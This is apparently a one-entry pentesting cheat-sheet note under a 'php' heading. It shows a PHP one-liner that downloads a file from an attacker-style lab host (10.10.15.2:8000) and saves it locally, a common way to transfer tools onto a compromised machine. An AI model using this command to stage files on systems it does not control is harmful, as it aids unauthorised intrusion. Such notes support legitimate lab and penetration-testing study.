php

Getting a file

php -r '$file = file_get_contents("http://10.10.15.2:8000/try.txt"); file_put_contents("try.txt",$file);'

Last updated